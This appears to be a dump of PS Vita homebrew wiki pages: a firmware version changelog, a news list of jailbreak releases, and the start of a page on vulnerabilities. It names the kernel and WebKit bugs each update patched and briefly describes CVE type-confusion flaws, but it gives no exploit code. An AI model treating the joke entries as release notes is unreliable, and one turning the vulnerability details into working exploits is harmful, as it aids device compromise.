* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
TBD<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/News&diff=11406Main Page/News2019-08-27T11:18:43Z<p>Xyz: h-encore2</p>
<hr />
<div>{{Box-round|title=News|<br />
* '''2019-08-26''': h-encore² is released<br />
* '''2019-05-05''': Trinity is released<br />
* '''2018-12-29''': [https://media.ccc.de/v/35c3-9364-viva_la_vita_vida 35C3: Viva la Vita Vida]<br />
* '''2018-07-01''': h-encore is released<br />
* '''2017-07-29''': HENkaku Ensō is released<br />
* '''2016-07-29''': HENkaku is released<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11313Vulnerabilities2019-07-31T23:58:46Z<p>Xyz: /* To be disclosed */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
